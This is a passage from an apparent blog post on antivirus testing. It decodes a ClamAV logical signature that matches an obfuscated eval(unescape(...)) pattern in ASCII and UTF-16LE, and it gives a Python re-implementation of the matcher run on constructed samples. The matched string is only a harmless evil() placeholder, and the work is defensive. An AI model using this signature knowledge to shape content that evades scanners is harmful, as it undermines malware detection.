000025e0  6e 00 67 00 73 00 21 00  0a 00 0a 00 00 4d 65 00  |n.g.s.!......Me.|
000025f0  76 00 61 00 6c 00 28 00  75 00 6e 00 65 00 73 00  |v.a.l.(.u.n.e.s.|
00002600  63 00 61 00 70 00 65 00  28 00 27 00 25 00 36 00  |c.a.p.e.(.'.%.6.|
00002610  35 00 25 00 37 00 36 00  25 00 36 00 39 00 25 00  |5.%.7.6.%.6.9.%.|
00002620  36 00 63 00 25 00 32 00  38 00 25 00 32 00 39 00  |6.c.%.2.8.%.2.9.|
00002630  27 00 29 00 29 00 0a 00  0a 00 01 5f 49 00 66 00  |'.).)......_I.f.|
00002640  20 00 74 00 68 00 69 00  73 00 20 00 68 00 61 00  | .t.h.i.s. .h.a.|
[/snip]
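The signature in test.ldb is the same throughout, and the two hexdumps above (the ASCII VBA stream in test file 22 and the UTF-16LE string in the executable pulled out of test files 26 and 27) are exactly the two cases its subsignatures cover. The following added example, which is not ClamAV's matcher, decodes that signature and re-implements the small subset of .ldb syntax it uses so you can see both subsignatures fire; the sample bytes are constructed.

```python
# Added example (not ClamAV's own matcher): parses the TestSig2 logical
# signature used in these scans, decodes its hex subsignatures so you can
# see what they look for, and evaluates it over constructed bytes: an ASCII
# eval(unescape(...)) like the VBA stream of test file 22 and its UTF-16LE
# form like the executable inside test files 26 and 27. Only the .ldb
# syntax this signature uses is handled ({-n} gaps, flat (a|b)/(a&b) logic).
import re
from typing import List

SIGNATURE = ("TestSig2;Target:0;(0|1);"
             "6576616c{-200}756e657363617065{-200}"
             "282725363525373625363925366325323825323927;"
             "6500760061006c{-200}75006e006500730063006100700065{-200}"
             "28002700250036003500250037003600250036003900"
             "25003600630025003200380025003200390027")
GAP_RE = re.compile(r"\{-(\d+)\}")          # {-n}: up to n arbitrary bytes


def parse_ldb(sig: str) -> dict:
    """Split Name;Target;Logic;Sub0;Sub1;... into its parts."""
    name, target, logic, *subs = sig.split(";")
    return {"name": name, "target": target, "logic": logic, "subsigs": subs}


def subsig_to_regex(subsig: str):
    """Turn hex-with-gaps into a bytes regex: {-n} becomes .{0,n}."""
    pattern = b""
    for i, piece in enumerate(GAP_RE.split(subsig)):
        if i % 2:                            # odd pieces are the gap sizes
            pattern += b".{0,%d}" % int(piece)
        elif piece:
            pattern += re.escape(bytes.fromhex(piece))
    return re.compile(pattern, re.DOTALL)


def decode_subsig(subsig: str) -> List[str]:
    """Readable view of each fixed chunk. UTF-16LE chunks are decoded even
    when the signature author dropped the final 0x00, as subsig 1 does."""
    out = []
    for c in (bytes.fromhex(p) for p in GAP_RE.split(subsig)[::2] if p):
        if len(c) >= 4 and not any(c[1::2]):          # every odd byte is 0
            text = c[: len(c) & ~1].decode("utf-16-le")
            out.append(text + (chr(c[-1]) if len(c) % 2 else ""))
        else:
            out.append(c.decode("latin-1"))
    return out


def eval_logic(expr: str, hits: List[bool]) -> bool:
    """Evaluate a flat (a|b|...) or (a&b&...) expression; the nested logic
    real .ldb signatures allow is out of scope here."""
    body = expr.strip("()")
    if "&" in body:
        return all(hits[int(i)] for i in body.split("&"))
    return any(hits[int(i)] for i in body.split("|"))


def scan(data: bytes, sig: str = SIGNATURE) -> bool:
    """True when the signature's logic holds over the given bytes."""
    parsed = parse_ldb(sig)
    hits = [subsig_to_regex(s).search(data) is not None
            for s in parsed["subsigs"]]
    return eval_logic(parsed["logic"], hits)


# Constructed samples shaped like the two hexdumps in the post.
ASCII_SAMPLE = b"\x2d\x00eval(unescape('%65%76%69%6c%28%29')) = evil()\x00"
UTF16_SAMPLE = (b"\n\x00\n\x00\x00\x4d"
                + "eval(unescape('%65%76%69%6c%28%29'))\n\n".encode("utf-16-le"))
BENIGN_SAMPLE = b"eval(unescape('%41%42'))"

if __name__ == "__main__":
    for s in parse_ldb(SIGNATURE)["subsigs"]:
        print(decode_subsig(s))
    print(scan(ASCII_SAMPLE), scan(UTF16_SAMPLE), scan(BENIGN_SAMPLE))
```

Decoding the subsignatures also shows what the Content IQ target string is: "eval", "unescape" and "('%65%76%69%6c%28%29'", with the percent-encoded part spelling evil().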

The next post in this series will examine how well ClamAV does against the Malicious Content IQ Test.